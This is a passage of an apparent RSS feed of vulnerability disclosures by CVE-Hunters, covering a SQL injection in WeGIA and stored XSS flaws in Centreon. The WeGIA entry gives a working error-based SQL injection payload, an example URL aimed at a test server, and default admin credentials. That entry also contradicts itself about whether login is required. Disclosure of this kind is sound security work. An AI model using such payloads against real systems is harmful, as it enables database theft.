    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g7hh-6qj7-mcqf&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g7hh-6qj7-mcqf&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/marcos-tolosa/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcos50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/marcos-tolosa/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcos Tolosa&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 16 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-23723</title>
        <link>https://www.cvehunters.com/p/cve-2026-23723/</link>
        <guid>https://www.cvehunters.com/p/cve-2026-23723/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-23723-sql-injection-error-based-vulnerability-in-id_memorando-parameter-on-atendido_ocorrenciacontrole-endpoint&amp;#34;&amp;gt;CVE-2026-23723: SQL Injection (Error-Based) Vulnerability in &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;Atendido_ocorrenciaControle&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-23723&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-23723&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An authenticated SQL Injection vulnerability was identified in the &amp;lt;code&amp;gt;Atendido_ocorrenciaControle&amp;lt;/code&amp;gt; endpoint via the &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt; parameter. This flaw allows for full database exfiltration, exposure of sensitive PII, and potential arbitrary file reads in misconfigured environments.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;Atendido_ocorrenciaControle&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;1 AND extractvalue(1, concat(0x7e, @@Version))
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-url&amp;#34;&amp;gt;Example url:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;https://sec.wegia.org:8000/WeGIA/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;metodo=listarTodosComAnexo&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;id_memorando=1%20AND%20extractvalue(1,%20concat(0x7e,%20@@version))
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Login to the WeGIA system (user:admin, password: wegia) and obtain a valid session cookie.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;The vulnerability was confirmed on the official security testing server: &amp;lt;code&amp;gt;sec.wegia.org:8000&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Send a GET request to the vulnerable endpoint with the following payload:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-23723-sql-injection-error-based-vulnerability-in-id_memorando-parameter-on-atendido_ocorrenciacontrole-endpoint&amp;#34;&amp;gt;CVE-2026-23723: SQL Injection (Error-Based) Vulnerability in &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;Atendido_ocorrenciaControle&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-23723&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-23723&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An authenticated SQL Injection vulnerability was identified in the &amp;lt;code&amp;gt;Atendido_ocorrenciaControle&amp;lt;/code&amp;gt; endpoint via the &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt; parameter. This flaw allows for full database exfiltration, exposure of sensitive PII, and potential arbitrary file reads in misconfigured environments.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;Atendido_ocorrenciaControle&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;1 AND extractvalue(1, concat(0x7e, @@Version))
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-url&amp;#34;&amp;gt;Example url:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;https://sec.wegia.org:8000/WeGIA/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;metodo=listarTodosComAnexo&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;id_memorando=1%20AND%20extractvalue(1,%20concat(0x7e,%20@@version))
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Login to the WeGIA system (user:admin, password: wegia) and obtain a valid session cookie.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;The vulnerability was confirmed on the official security testing server: &amp;lt;code&amp;gt;sec.wegia.org:8000&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Send a GET request to the vulnerable endpoint with the following payload:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-23723/image.png&amp;#34;
	width=&amp;#34;1481&amp;#34;
	height=&amp;#34;573&amp;#34;
	srcset=&amp;#34;/p/cve-2026-23723/image_hu_50c6c393ec22c46a.png 480w, /p/cve-2026-23723/image_hu_ea035905a73cb2a0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;258&amp;#34;
		data-flex-basis=&amp;#34;620px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Observe that the system returns a error message, confirming the injection:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-23723/image-1.png&amp;#34;
	width=&amp;#34;681&amp;#34;
	height=&amp;#34;32&amp;#34;
	srcset=&amp;#34;/p/cve-2026-23723/image-1_hu_61812a024882cb4a.png 480w, /p/cve-2026-23723/image-1_hu_4211dac53e8c18cb.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;2128&amp;#34;
		data-flex-basis=&amp;#34;5107px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/viniciusCastro50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Vinicius Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 16 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-12511</title>
        <link>https://www.cvehunters.com/p/cve-2025-12511/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-12511/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-12511-cross-site-scripting-xss-stored&amp;#34;&amp;gt;CVE-2025-12511: Cross-Site Scripting (XSS) Stored
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12511&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12511&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the DSM Administration’s Extensions configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-12511-cross-site-scripting-xss-stored&amp;#34;&amp;gt;CVE-2025-12511: Cross-Site Scripting (XSS) Stored
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12511&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12511&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the DSM Administration’s Extensions configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12511-centreon-dsm-medium-severity-5361&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12511-centreon-dsm-medium-severity-5361&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 05 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-12513</title>
        <link>https://www.cvehunters.com/p/cve-2025-12513/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-12513/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-12513-cross-site-scripting-xss-stored&amp;#34;&amp;gt;CVE-2025-12513: Cross-Site Scripting (XSS) Stored
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12513&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12513&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the Hosts configuration parameters page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-12513-cross-site-scripting-xss-stored&amp;#34;&amp;gt;CVE-2025-12513: Cross-Site Scripting (XSS) Stored
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12513&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12513&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
